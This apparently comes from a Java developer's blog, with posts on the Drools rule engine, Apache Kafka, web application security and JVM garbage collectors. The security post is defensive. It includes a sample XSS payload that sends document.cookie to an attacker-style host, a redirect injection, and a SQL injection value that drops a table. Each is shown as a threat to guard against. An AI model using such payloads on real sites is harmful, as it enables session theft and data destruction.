Tech It Easy

Having been a tech professional for the last 17 years, primarily in Java and J2EE, I have decided to start this blog to share my insights into tech. While the focus will be primarily on Java and Java Enterprise, I will also cover other areas like Design Patterns, Java Architecture and Databases, as well as newer areas like DevOps and Big Data.

My endeavor is to educate and inform people on tech in a way that is simpler and easier to understand, while also acting as a one-stop source of information and knowledge.


Drools - Rule Engine

High-level View of a Rule Engine

One of the many branches of AI is Expert Systems, which use knowledge representation to codify knowledge into a knowledge base that can be used for reasoning. Simply put, we can process data against this knowledge base to deduce conclusions. What you are doing here is automating the reasoning and logic part of an application, or creating a template for the logic to be implemented. For example, say we have an online shopping system which gives discounts based on the points you have accumulated as a user. Typically we could code this logic manually and run it in the application. The problem is that as the number of business rules for discounts increases, the effort increases, and maintainability becomes an issue. Now what if we had a ready-made set of rules in the form of a template that could be used by the application? What this effectively means is that instead of coding the rules in the application, we simply add them to the template, which in turn is processed by the application.

Drools is a Rule Engine that uses a rule-based approach to implement an Expert System, and is more precisely classified as a Production Rule System. The term Production Rule is described as a "set of rules that mathematically delineates a set of finite length strings over an alphabet". What Business Rule Management Systems do is build additional value on top of a general-purpose Rule Engine by providing facilities for rule creation, management, deployment and so on. The Production Rule System is Turing complete, with a focus on knowledge representation to express propositional and first-order logic in an unambiguous manner. The brain of a Production Rule System is the Inference Engine, which is able to scale to a large number of rules. What the Inference Engine does is match facts and data against the Production Rules, or simply Rules. A Production Rule is a two-part (when/then) structure that uses first-order logic for reasoning.

Now consider an online shopping application where a discount is given for Aug 15, and the rates vary by category: Books - 10%, Toys - 15%. Typically a rule would be defined like this:

When
    Purchase_Date is Aug 15, 2017
    Category is Books
Then
    Offer Discount 10% on Price

When
    Purchase_Date is Aug 15, 2017
    Category is Toys
Then
    Offer Discount 15% on Price

The process of matching new or existing facts against Production Rules is called Pattern Matching, and it is performed by the Inference Engine. Inference Engines use a number of algorithms for Pattern Matching, such as Linear, Rete, Treat and Leaps. Drools uses the Rete algorithm in an implementation called ReteOO, signifying an enhanced and optimized implementation of the algorithm for object-oriented systems. Rules are stored in the Production Memory, while the Facts the engine matches against are asserted into the Working Memory.

If we consider the above example, the Rule here is: if Purchase Date is Aug 15 and Category is Books, then give a discount of 10%. The Facts are basically POJOs that contain the data, in this case an object like Order, which has the Purchase Date and Category of Item that are matched against the Rules. Now, with many facts and rules, you can have a scenario where multiple rules end up being true for the same fact assertion, resulting in a conflict. In such a scenario, an Agenda manages the execution order of these conflicting rules using a Conflict Resolution Strategy.
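
As a hedged sketch of how an application hands facts to Drools (the session name, the kmodule configuration it implies, and the Order POJO are all assumptions made for this example; the rules themselves would live in a .drl file like the discount rules above):

import org.kie.api.KieServices;
import org.kie.api.runtime.KieSession;

public class DiscountRunner {

    // A hypothetical fact class; rule patterns would match on its fields, e.g. Order(category == "Books")
    public static class Order {
        private final String purchaseDate;
        private final String category;
        public Order(String purchaseDate, String category) {
            this.purchaseDate = purchaseDate;
            this.category = category;
        }
        public String getPurchaseDate() { return purchaseDate; }
        public String getCategory() { return category; }
    }

    public static void main(String[] args) {
        KieServices ks = KieServices.Factory.get();
        KieSession session = ks.getKieClasspathContainer().newKieSession("discount-session");

        session.insert(new Order("2017-08-15", "Books"));   // assert the fact into working memory
        session.fireAllRules();                             // the inference engine matches facts against rules
        session.dispose();
    }
}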

Apache Kafka - Messaging

We had a brief introduction to Apache Kafka in the previous post; now we shall look at how Apache Kafka's stream-based model fits in with a typical messaging system.

What is a messaging system?

A messaging system basically transfers data from one application to another, leaving the application free to focus only on the data and not on how it is actually shared. What happens here is that messages are queued asynchronously between client applications and the messaging system. Typically there are two kinds of messaging patterns available: one is point-to-point or queuing, and the other is publish-subscribe or pub-sub, the more widely used pattern.

Point-to-Point Messaging system

Typically in a point-to-point queuing model, all messages are persisted in a queue, and you can have one or more consumers reading them, but a particular message can be consumed by only one consumer. The advantage here is that data processing can be divided over multiple consumer instances, making scalability easier. The disadvantage is that a queue cannot be accessed by multiple subscribers.

Publish-Subscribe Messaging system

The standard pub-sub model, on the other hand, allows you to broadcast a record to multiple consumers or subscribers. The messages are persisted in a topic, and consumers can subscribe to one or more topics. However, the disadvantage here is that you can't scale processing, as every message goes to every subscriber.

Kafka combines the advantages of these two approaches in its consumer group model. The consumer group allows you to divide up processing over a collection of processes (the members of the group), much like the point-to-point queuing model, while still allowing you to broadcast messages to multiple consumer groups, as in pub-sub. Every topic in Kafka can be consumed by multiple subscribers, and consumption can be scaled.

Ordering of Records

In the traditional queue model, records are retained on the server in the order they are stored, and when multiple consumers consume from the queue, the records are handed out in that same order. The problem is that when records are delivered asynchronously to consumers, they may arrive in a different order. There is a workaround: messaging systems have the concept of an exclusive consumer, where only one process consumes from a queue, but then we would have to give up parallel processing.

Kafka gets around this by implementing partitions within topics, which ensures both ordering and load balancing over processes. The partitions in a topic are assigned to the consumer instances in a group so that each partition is consumed by exactly one consumer in the group. However, we must ensure that the number of instances in a consumer group is not more than the number of partitions.
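
A minimal consumer sketch (the broker address, topic name and group id are assumptions, and it uses the poll(Duration) overload from newer client versions): every instance started with the same group.id joins the same consumer group and is assigned a share of the topic's partitions.

import java.time.Duration;
import java.util.Collections;
import java.util.Properties;
import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.clients.consumer.ConsumerRecords;
import org.apache.kafka.clients.consumer.KafkaConsumer;

public class OrderConsumer {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "localhost:9092");      // assumed broker address
        props.put("group.id", "order-processors");             // instances sharing this id form one group
        props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");

        try (KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props)) {
            consumer.subscribe(Collections.singletonList("orders"));   // hypothetical topic
            while (true) {
                ConsumerRecords<String, String> records = consumer.poll(Duration.ofMillis(500));
                for (ConsumerRecord<String, String> record : records) {
                    // Each partition is read by exactly one consumer in the group, preserving per-partition order
                    System.out.printf("partition=%d offset=%d value=%s%n",
                            record.partition(), record.offset(), record.value());
                }
            }
        }
    }
}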

Kafka also has a pretty good built-in storage system: the data is written to disk and replicated for fault tolerance. A write in Kafka is not considered complete until it is fully replicated, and it is guaranteed to persist even if a server fails.

Kafka does not just read and write streams of data, it also does real-time processing of streams. A stream processor in Kafka reads streams of data from input topics, processes them and produces streams of data to output topics. For example, a ticket booking application would read booking requests from input topics and output a stream of booked tickets or reservations. The advantage is that Kafka has its own Streams API, which implements stream processing. The Streams API builds on the other core capabilities of Kafka: the producer and consumer APIs for input and output, the stateful storage facilities, and the group mechanism and replication for fault tolerance.
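
A hedged sketch of the booking example with the Streams API (the topic names, application id and the "processing" step are assumptions made up for illustration):

import java.util.Properties;
import org.apache.kafka.common.serialization.Serdes;
import org.apache.kafka.streams.KafkaStreams;
import org.apache.kafka.streams.StreamsBuilder;
import org.apache.kafka.streams.StreamsConfig;

public class BookingProcessor {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put(StreamsConfig.APPLICATION_ID_CONFIG, "booking-processor");
        props.put(StreamsConfig.BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");
        props.put(StreamsConfig.DEFAULT_KEY_SERDE_CLASS_CONFIG, Serdes.String().getClass());
        props.put(StreamsConfig.DEFAULT_VALUE_SERDE_CLASS_CONFIG, Serdes.String().getClass());

        StreamsBuilder builder = new StreamsBuilder();
        builder.stream("booking-requests")                        // read booking requests from the input topic
               .mapValues(value -> "CONFIRMED: " + value)         // stand-in for the real reservation logic
               .to("booked-tickets");                             // write the result stream to the output topic

        KafkaStreams streams = new KafkaStreams(builder.build(), props);
        streams.start();
    }
}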

Apache Kafka - Introduction

What is Apache Kafka?

Kafka is basically an open source distributed streaming platform which makes data integration between systems much simpler. A stream here is the pipeline through which applications continuously receive data. Kafka as a streaming platform has two main features:

  • It captures data streams or event streams and feeds them to other data systems like RDBMSs, key-value stores or warehouses.
  • All the stream events are placed in an append-only queue called a log. Since the data in the log is immutable and continuous, real-time processing is possible.

In a way Kafka is similar to a traditional message queue or enterprise messaging system, only here it does the same for streams of records. Better throughput, built-in partitioning and fault tolerance also make it a better solution for large-scale message processing applications.

If we take a look at how Kafka works: producers send messages, which are stored in Kafka. Kafka places these messages in different partitions, which in turn are grouped into topics. Within each partition, you have multiple messages, indexed and stored with a key, value and timestamp. Processes called consumers then read the messages stored in the partitions. Kafka itself runs on a cluster of one or more servers, and partitions are distributed across the cluster nodes.
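
A minimal producer sketch (the broker address, topic, key and payload are invented for illustration); the record key is what the default partitioner uses to pick a partition:

import java.util.Properties;
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerRecord;

public class OrderProducer {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "localhost:9092");
        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");

        try (KafkaProducer<String, String> producer = new KafkaProducer<>(props)) {
            // Records with the same key land in the same partition, which preserves their relative order
            producer.send(new ProducerRecord<>("orders", "order-42", "book:1"));
        }
    }
}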

Kafka has four major APIs.

  • Producer API - allows an application to publish a stream of records to one or more Kafka topics.
  • Consumer API - allows an application to subscribe to one or more topics and process the stream of records delivered to it.
  • Streams API - allows an application to act as a stream processor, consuming an input stream from one or more topics and producing an output stream to one or more output topics.
  • Connector API - allows building reusable producers or consumers that connect Kafka topics to existing applications or data systems.

Before we explore Kafka further, we need a basic idea of the terminology used, like topics and brokers. The diagram below illustrates it well.

[Diagram: Kafka fundamentals]

The data is stored in topics, which are basically streams of messages belonging to a particular category or feed. Topics are multi-subscriber: they can have zero or more consumers subscribing to the data written to them. Each topic is split into partitions; a partition is basically an ordered, immutable sequence of messages, implemented as a set of segment files. This sequence of messages forms a structured commit log that is only appended to, and each record or message in a partition is given a sequential id called the offset.

Each partition has one server which acts as the "leader", responsible for all reads and writes, while the nodes that passively replicate the leader are called followers. If the leader fails, one of the followers automatically becomes the new leader. A server can act as the leader for one partition and a follower for other partitions, which makes load distribution easier.

All published records are retained by Kafka for a configured period of time, after which they are discarded to free up space. The consumer, however, has control over the offset, so it can read the records in any order it likes. Having partitions allows a log to scale beyond a size that would fit on a single server, and also allows a topic to hold an arbitrary amount of data.

The published data in turn is managed by brokers, and each broker may have zero or more partitions per topic. The brokers are essentially servers, each handling data and requests for its share of the partitions. Each partition has replicas, which act as backups to protect against data loss. Now if a topic has 5 partitions and there are 5 brokers, each broker will have one partition. If the topic has 5 partitions but there are more than 5 brokers, the first 5 brokers will have one partition each and the remaining brokers will have none. A Kafka cluster contains multiple brokers and can be expanded without downtime. The cluster manages the persistence and replication of message data.

Producers publish messages to one or more Kafka topics, and they are also responsible for choosing which record to assign to which partition within a topic. Consumers, on the other hand, read the data or messages from the brokers; they subscribe to one or more topics and consume messages by pulling data from the various brokers.

As we can see from the diagram above, consumers are typically organized into groups. Each record published to a topic is delivered to one consumer instance within each subscribing group. These instances can be in separate processes or on separate machines. If all instances are in the same group, records are effectively load balanced over them; if they are in different groups, each record is broadcast to all the groups.

Web Application Security

One of the biggest challenges on the web is security. When we speak of security, it is something everyone recognizes the need for, but most really do not have much idea of how to go about it. The standard perception of security is that you log in with your credentials, the application or website authenticates them, and takes you to your home page. And yes, there is authorization, where you are given access based on your role. Authentication and authorization, though, are a very basic view of web security; there is a much larger scope out there to be explored.

The problem is quantifying security, or answering the question "how secure is your web application?". It is not possible to explore the entire security landscape in a single article; what this post intends to do is take a broad look at some of the security risks and how to tackle them. Basically it comes down to a question of trust: do we trust the integrity of data coming in from a browser? Do we trust that the connection between the browser and the application can't be tampered with?

Validating Form Input

Basically, when we enter some data in an HTML form, we trust that we are entering valid data, thanks to the built-in form validations via client-side JavaScript or server-side rules. But is the data we are entering in a form secure? No.

Even if we are using HTTPS and doing form validation, the data we get from a form is basically untrustworthy. A user can use something like curl to submit false data or modify the markup, or it could be untrustworthy data from a hostile website. The problem with malformed data is that there is every chance of unexpected behavior or data leaks. For example, consider the following code where the user selects the type of notification:

final String notificationType = req.getParameter("notification");

if (notificationType.equals("email")) {
    notifyEmail();
} else if (notificationType.equals("SMS")) {
    notifySMS();
} else {
    showError("Select valid notification kind");
}

How do we ensure that uncontrolled flow is eliminated here? This is where form validation comes in. Invalid input data can violate business logic, trigger faults, or even allow an attacker to take control, and input validation is often the first line of defense against this risk. Basically this is for values restricted to a particular range; for example, during a fund transfer, entering an amount like -9000 makes no sense. This form of input validation, ensuring data is entered in the right format, is called positive validation or whitelisting. But what do we do when input fails validation? In the example above, if you get a value other than SMS or email, there is either a bug or an attack. If the provided notificationType is "Chat", you might show an error message saying Chat is not a valid notification. But what if you get a notificationType like:

new Image().src = 'http://badguy.ratnakar.com/steal?' + document.cookie

This is a more serious reflected XSS attack that steals session cookies, and you really can't echo this back as user feedback. One approach is to filter out the <script> tag. This strategy of rejecting input containing known dangerous values is called negative validation or blacklisting. The problem is that the list of possible dangerous input values is very large and needs to be constantly maintained. Another option is sanitization, where instead of rejecting undesirable input you simply filter out the dangerous parts. Again, this is not particularly safe, as an attacker could bypass it.

Most frameworks like Struts and Spring have built-in input validation functionality, and it is also available in external libraries. The advantage is that the validation logic is pushed to the first layer of your web tier, ensuring invalid data does not reach your application.
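
As a minimal sketch of what that first layer can look like, here is a form class annotated with Bean Validation (javax.validation) constraints, which Spring and most modern frameworks can enforce automatically; the class and field names are made up for this example:

import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Pattern;

public class TransferForm {

    // Positive validation (whitelisting): only the two known notification channels are accepted
    @NotNull
    @Pattern(regexp = "email|SMS")
    private String notificationType;

    // A transfer amount must be a sensible positive value, never something like -9000
    @Min(1)
    private long amount;

    // getters and setters omitted for brevity
}

A Validator obtained from Validation.buildDefaultValidatorFactory() (or Spring's @Valid on a controller method parameter) would then reject any request violating these constraints before it reaches the business logic.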

Encode HTML Output

Apart from input data, developers also need to look at the output. A standard web application has HTML markup for structure, CSS for styling, JavaScript for logic, and user-generated content from the server side, all rendered together. Browsers try to render content even if it is malformed, which is a major point of vulnerability, and the risk becomes higher when you render data from an untrusted source. As we saw earlier, what happens if we get input containing special characters like {}, <> or "? This is where output encoding comes in.

Basically, output encoding is the process of converting output data into its final rendered format. The problem is that you may need a different encoding depending on how the data is consumed. Without proper encoding, there is every chance of the client getting malformed data that could be exploited by an attacker. For example, say our PM himself is a customer of the site. In HTML it would be

<p>Narendra Modi</p>

or rendering it as Narendra Modi.

But what happens if we get output like

document.getElementById('name').innerText = 'Narendra 'Damodardas' Modi' // <-- unescaped string

This is what we call malformed JavaScript, and it is exactly what attackers look for. Now suppose the name is entered as

Narendra 'Damodar' Modi';window.location='http://villian.gabbarsingh.com/';

You are pushing the user to a hostile website; this is where you need to implement an encoding strategy, so that the value is rendered as

'Narendra \'Damodar\' Modi\';window.location=\'http://villian.gabbarsingh.com/\';'

This is just one way of encoding, using the \ escape character. Most frameworks have mechanisms for rendering content safely and filtering out reserved characters. With the plethora of frameworks and encoding contexts available, there are certain rules to observe: check what kind of encoding your framework does, and for which context. While you could handle encoding at rendering time, that often adds a lot of complexity to the code, as does posting the data in a non-HTML format.
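
To make the idea concrete, here is a minimal, hand-rolled escaping helper for an HTML body context; in practice you would normally rely on your template engine's or framework's own encoder rather than code like this:

public final class HtmlEscaper {

    // Replaces the handful of characters that are dangerous in an HTML context
    public static String escapeHtml(String input) {
        if (input == null) return "";
        StringBuilder sb = new StringBuilder(input.length());
        for (char c : input.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }
}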

Bind Parameters for Database Queries

The database is the most crucial part of a web application, as it contains state that can't be easily restored, as well as sensitive information that needs to be protected. Whether you are using SQL, an ORM or a NoSQL database, you need to look at how input data is used in your queries. Let's say I have this method for adding new students:

void addStudent(String lastName, String firstName) {
    String query = "INSERT INTO students (last_name, first_name) VALUES ('"
            + lastName + "', '" + firstName + "')";
    getConnection().createStatement().execute(query);
}

Now if I call addStudent("Sadasyula", "Ratnakar"), the generated SQL would be

INSERT INTO students (last_name, first_name) VALUES ('Sadasyula', 'Ratnakar')

But now suppose the firstName input is something like Bobby'); DROP TABLE Students;-- so that the generated SQL becomes

INSERT INTO students (last_name, first_name) VALUES ('AAA', 'Bobby'); DROP TABLE Students;--')

It actually ends up executing two commands: the INSERT as well as DROP TABLE Students.

This has ample scope for misuse, including violating data integrity and exposing sensitive information.

A very simple defense against this issue is parameter binding, as shown below. It separates executable code from content and makes the handling transparent. It also helps keep the code clean and more comprehensible.

void addStudent(String lastName, String firstName) {
    PreparedStatement stmt = getConnection().prepareStatement(
            "INSERT INTO students (last_name, first_name) VALUES (?, ?)");
    stmt.setString(1, lastName);
    stmt.setString(2, firstName);
    stmt.execute();
}

In JDBC it is always preferable to use parameter binding rather than string concatenation when building queries. The same applies to Hibernate or JPA, using setParameter. In fact, even if you are using a NoSQL database, it is still vulnerable to injection attacks.
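
As a hedged illustration of the JPA/Hibernate equivalent (assuming a Student entity and an EntityManager, both hypothetical here), named parameters keep the user input out of the query text just as PreparedStatement placeholders do:

// entityManager and the Student entity are assumed to exist elsewhere in the application
List<Student> students = entityManager
        .createQuery("SELECT s FROM Student s WHERE s.lastName = :lastName", Student.class)
        .setParameter("lastName", lastName)
        .getResultList();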

Protecting Data in Transit

So far we have looked only at input and output data, but what about data in transit? If we are using a plain HTTP connection, the data is transferred in plain text and is vulnerable to misuse. In transit between the browser and the server, an attacker can eavesdrop or tamper with it in what is called a man-in-the-middle attack. Open Wi-Fi networks, like those in airports or cafes, are especially vulnerable: an ISP could inject ads into the traffic, or the traffic could be used for surveillance.

HTTPS was originally used to secure sensitive web data, like financial transactions, but it has now become the default mode even on social networking sites. The HTTPS protocol uses Transport Layer Security (TLS), the successor to SSL (Secure Sockets Layer), to secure communications. It provides confidentiality and data integrity, as well as authenticating the web site's identity. It had some initial hurdles, such as expensive hardware and the limitation of one web site certificate per IP address, but modern hardware has made it cheaper, and a protocol extension called SNI (Server Name Indication) has made it possible to serve certificates for multiple sites from a single IP address. The introduction of free certificate services like Let's Encrypt has made it even more widespread.

When we use TLS, a site provides its identity using a public key certificate, which contains information about the site as well as the public key; the site proves it owns the certificate using a private key that only it knows. Generally a trusted third party called a Certificate Authority (CA) verifies the site's identity and grants a signed certificate to indicate it has been verified. There are different levels of certification on offer, the most basic being Domain Validation (DV), which certifies that the certificate owner controls a domain. Others like Organization Validation (OV) and Extended Validation (EV) perform additional checks.

You can configure your server to support HTTPS, but how do we make sure our site or application stays compatible with users on very old browsers that support much older protocols and algorithms? Supporting dated versions of the protocols makes a site very vulnerable to attack. Fortunately there are tools like Mozilla's SSL Configuration Generator that generate configurations for common web servers. Often a website uses HTTPS for only some resources, say the login page or confidential data. The problem is that a plain HTTP request is very susceptible to a man-in-the-middle attack, and we can't simply shut down the HTTP port, as the browser typically needs to be redirected to HTTPS when the user types in an HTTP address.

However, just redirecting requests is a risky approach by itself. To get over this, most browsers nowadays support a powerful feature called HSTS (HTTP Strict Transport Security), which tells the browser to interact with a site only over HTTPS. Enabling HSTS makes the browser automatically convert HTTP requests to HTTPS. Also, setting the secure flag on a cookie instructs the browser to send it only over HTTPS, which protects sensitive information. Finally, you can make use of SSL Labs' SSL Server Test to perform a deep analysis of your configuration.
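
For reference, the HSTS policy is delivered as a response header; a typical value (the max-age below is one year, chosen only as an example) looks like this:

Strict-Transport-Security: max-age=31536000; includeSubDomains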

Protecting User Passwords

Passwords are one of the most vulnerable assets of your application. Storing the user id and password in a database table is the most obvious approach, but it is not at all recommended. While it does keep out invalid users, it is vulnerable in many other ways: someone like an application developer or DBA who has access to the credentials can easily impersonate a user, and storing a password in the database with no cryptographic protection exposes it to many other attack vectors.

One way of securing passwords is hashing: using a cryptographic hash algorithm to transform the password into a value that is practically impossible to reverse. For example, if you have the password "helloworld", applying a hash algorithm gives some hex digest, and that is what gets stored in the database. To validate a login, apply the same hash algorithm to the submitted password text and check whether the result matches the stored value.

The issue, though, is that if multiple users use the same password "helloworld", they will all have the same hash in the database. An attacker who gets hold of the password store can reverse-engineer passwords by cross-referencing a lookup table of precomputed password hashes.

This is where we use a "salt": some extra random data added to the password before hashing. The advantage is that two instances of the same password won't have the same hash value. So if we have two users with the password "helloworld", we can use the salt string "ABCE" for one and "DFDGF" for the other, ensuring two different hash values. What you store is the hash along with the salt and the work factor. When the user logs in, the application uses the stored salt again to generate a hash and compares it with the one in the database.
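
A minimal sketch of salted hashing using PBKDF2, which ships with the JDK (the iteration count, or work factor, and the key length below are illustrative values, not a recommendation):

import java.security.SecureRandom;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class PasswordHasher {

    // A fresh random salt for every password, so identical passwords get different hashes
    public static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    // Hash = PBKDF2(password, salt, work factor); store salt + work factor + hash together
    public static byte[] hash(char[] password, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(password, salt, 100_000, 256);
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        return factory.generateSecret(spec).getEncoded();
    }
}

At login, re-run hash() with the supplied password and the stored salt, and compare the result with the stored hash, ideally with a constant-time comparison such as MessageDigest.isEqual.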

Authenticate Users

Authentication is basically validating a user when logging into an application, while authorization defines what a user is allowed to do. For example, if you log into a banking application, you can check your balance statement but cannot modify it. Authentication and authorization are tied together by session management. What session management does is relate requests to a particular user, so that the user does not have to authenticate on each request: once a user is authenticated, their identity is tied to a session for subsequent requests.

One concern is how to keep credentials private when sent over the network; the easiest answer is to use HTTPS for all requests. A common approach is a login form where the user enters credentials that are validated against the database. We can also authenticate users using a PIN or a mobile code. One of the more convenient options is SSO (Single Sign-On), where users log in using a single identity; for example, you can log into many sites using your Google credentials, with SSO relying on an external service to manage the login. At times a single factor of authentication, like username and password, may not be enough. In that case you can use TFA (Two-Factor Authentication), which could be a secret code sent to your mobile phone or a hardware token; for example, an online shopping or travel website may send a secret code to the user's mobile to validate a transaction. Also, when a user enters an invalid password, it is better to offer an email link to reset the password than to reveal details in an error message. Most frameworks have authentication mechanisms that support a variety of schemes, the best examples being Apache Shiro and Spring Security.

Protecting User Sessions

HTTP, being stateless, has no built-in mechanism for relating user data across requests, which is why we use sessions. Sessions are a vulnerable target for attacks: if someone hijacks an authenticated session, they can effectively bypass authentication. One safeguard is to use an existing framework to handle session management. Sessions are typically tracked using a session identifier inside a cookie sent by the user's browser, and if an attacker manages to get hold of a session id, they can hijack the entire session. For example, if session ids follow a predictable sequence, say AAA243HH and AAA3484KK, an attacker can guess the encoding and decode or predict the values.

To get over this, it is better to have a session id of at least 128 bits generated using a secure pseudorandom number generator. Some implementations put user information inside the cookie to avoid a lookup in a data store; unless implemented with care, this can actually lead to more problems. If you do need to store data in a cookie, do not store confidential data like the user id or password, and limit its length. Also, do not expose session identifiers in a URL, as they can leak to third parties who could use them for their own ends.
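
A minimal sketch of generating such an identifier with the JDK's cryptographically secure generator (16 bytes = 128 bits, Base64url-encoded so it can travel in a cookie):

import java.security.SecureRandom;
import java.util.Base64;

public class SessionIdGenerator {

    private static final SecureRandom RANDOM = new SecureRandom();

    public static String newSessionId() {
        byte[] bytes = new byte[16];               // 128 bits of unpredictable data
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }
}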

If you are using cookies, some simple precautions have to be taken to make sure they are not unintentionally exposed. There are four relevant attributes here: Domain restricts the scope of a cookie to a particular domain, and Path restricts it to a path and its subpaths; you need to ensure that Path and Domain are as restrictive as possible. The Secure flag indicates that the browser should send the cookie only over HTTPS, and the HttpOnly flag indicates that the cookie should not be accessible to JavaScript or any client-side script. So it could look something like

Set-Cookie: sessionId=[FDJ5435JJJ]; path=/mybooks/; domain=mybooks.ratnakar.com; secure; HttpOnly

Another way to reduce risk is effective management of the session lifecycle. There is a chance that an attacker can set the session id to that of a less privileged session, for example via a hidden form field; this attack is called session fixation. There are two ways to tackle it: create a new session whenever the user authenticates or moves to a higher privilege level, and generate the session id ourselves. We should also set session timeouts, so that a session does not stay valid long enough for an attacker to break in. How long depends on the application: Facebook might have a long timeout, while your net banking application might time out after just 10 minutes.

Authorize Actions

We have seen that authorization is used to enforce what a user may and may not access. Authorization must always be done on the server; merely hiding the delete button on a page from a user is risky. The client should never pass authorization information to the server, only temporary identifiers like session ids, and by default every action should be denied unless explicitly allowed.

Generally speaking you have two kinds of authorization: global permissions and resource-level permissions. Global permissions are generally straightforward, as they apply across all resources. For example, if I need to shut down the server, it could be something like

public String shutdown(User callingUser) {
    if (callingUser != null && callingUser.hasPermission(Permission.SHUTDOWN)) {
        doShutdown();
        return "SUCCESS";
    } else {
        return "PERMISSION_DENIED";
    }
}

Resource-level authorization, on the other hand, is more complex, as it validates whether an actor can act on a particular resource. For example, a user has the right to modify only their own profile, not anyone else's.

If we take the entire process, it would be as follows

  • An actor becomes a principal after authentication.
  • A policy specifies what actions the principal can take against a resource.
  • Only if the policy allows the action is it executed.

The most common form of authorization is RBAC (Role-Based Access Control): users are given roles, which in turn are assigned permissions. For example, if an Admin has permission to delete users, we implement the code so that only someone in that role can perform the action. Here we link the role to the action instead of the user identity, so whoever holds the Admin role can delete users.

But what if some admins should only be able to add and modify users, not delete them? In such a case it is more appropriate to go with permission-based access control instead of just roles, mapping the user identity to permissions. Role-based access works well if you have a fixed set of permissions and there is not a large permutation of user permissions.
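
A hedged sketch of what permission-based checks can look like (the roles, permissions and mapping below are invented for illustration): the code checks the permission required by the action, not the caller's role name.

import java.util.EnumSet;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

public class AccessPolicy {

    enum Permission { ADD_USER, MODIFY_USER, DELETE_USER }

    // Example role-to-permission mapping; a real system would load this from configuration or a database
    private static final Map<String, Set<Permission>> ROLE_PERMISSIONS = new HashMap<>();
    static {
        ROLE_PERMISSIONS.put("ADMIN", EnumSet.allOf(Permission.class));
        ROLE_PERMISSIONS.put("JUNIOR_ADMIN", EnumSet.of(Permission.ADD_USER, Permission.MODIFY_USER));
    }

    // The action asks for a permission, so a JUNIOR_ADMIN can add or modify users but never delete them
    public static boolean isAllowed(String role, Permission required) {
        return ROLE_PERMISSIONS
                .getOrDefault(role, EnumSet.noneOf(Permission.class))
                .contains(required);
    }
}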

However, if the security requirements are more advanced than RBAC can handle, it is better to go for Attribute-Based Access Control (ABAC). For example, I may want to grant permissions based on the user's job description or country: admins in India can read and update the user list while admins in China can only read it, or admins can't delete users on a national holiday or weekend. You can make use of XACML here, a policy format defined by OASIS. ABAC is suited to cases where permissions are highly dynamic and access control is sensitive enough to need many such attributes factored in.

Other approaches that can be considered are

MAC - Mandatory Access Control: a centrally managed policy that can't be overridden by subject attributes.

REBAC - Relationship-Based Access Control: policy is determined by the relationship between principals and resources.

DAC - Discretionary Access Control: owner-managed access control.

And finally some standard precautions

  • Always set the Cache-Control header to "private, no-cache, no-store" for protected resources, to ensure your server-side authorization code is always called.
  • Reduce duplication of authorization logic.

Java Garbage Collectors

We explored Garbage Collection and its basic concepts in the previous post. One thing we need to understand straight up is that the JVM does not have one single type of garbage collector; it has four different ones, each with its own advantages and disadvantages. Which one to use ultimately depends on your application. These four collectors do have one common feature: they are generational in nature, which basically means they split the managed heap into different segments. Now let us examine each of the collector types one by one.

Serial Collector

The simplest one, mainly for single-threaded environments (such as 32-bit Windows) or small heaps. It freezes all application threads while doing garbage collection, which means it is suitable only for standalone applications; you would never use it in a server-side environment. It can be turned on with the -XX:+UseSerialGC JVM argument.

Parallel (Throughput) Collector

The default collector of the JVM, its biggest advantage is that it uses multiple threads to scan through the heap and compact it. The problem is that whenever it performs a minor or full GC, it stops all application threads, pausing the application. Basically, if you have an application where pauses are acceptable, or you want to optimize for lower CPU overhead, go for it.

CMS Collector

The Concurrent Mark Sweep collector, as the name indicates, uses multiple threads running concurrently with the application to "mark" the unused objects in the heap which can then be recycled ("sweep"). It goes into Stop-The-World mode only in two cases: when performing the initial marking of roots (objects in the old generation reachable from thread entry points), and when the application has changed the heap state while the algorithm was running concurrently, forcing it to do some final touches to ensure the right objects are marked.

How does this work?

Coming to your next question: when we speak of Mark and Sweep, there are two parts. As the name suggests, Mark is when unused objects are identified for deletion. By default the mark status of every new object is set to false (0); all reachable objects are then set to mark status true (1). The algorithm does a depth-first search: every object is treated as a node, and all nodes (objects) reachable from it are visited, continuing until all reachable nodes have been visited.

In the Sweep phase, all those objects whose mark value is still false are deleted from the heap memory, and all the reachable objects are reset to false for the next cycle. The process is then run again to release newly unreferenced objects. It is also called a tracing garbage collector, as it traces out the entire set of objects that are directly or indirectly accessible.

The major problem with CMS is that it can encounter a promotion failure, where a race condition occurs between the young and old generations: the collector fails to make space in time to promote objects from young to old. It then first has to create that space, which ends up causing the Stop-The-World pause it was meant to avoid in the first place. To avoid this issue, either increase the size of the old generation or the entire heap, or allocate more background threads to the collector.

It also uses more CPU to provide higher throughput, using multiple threads to perform scanning and collection. It can be used for server applications that have to run continuously and can't afford long pauses. The collector is enabled with the -XX:+UseConcMarkSweepGC flag, typically combined with -XX:+UseParNewGC for the young generation.
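
As an illustration only (the heap size and thread count are example values, and the main class name is hypothetical), a CMS-based startup along those lines might look like:

java -Xmx4g -XX:NewRatio=2 -XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:ConcGCThreads=4 MyServerApp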

G1 Collector

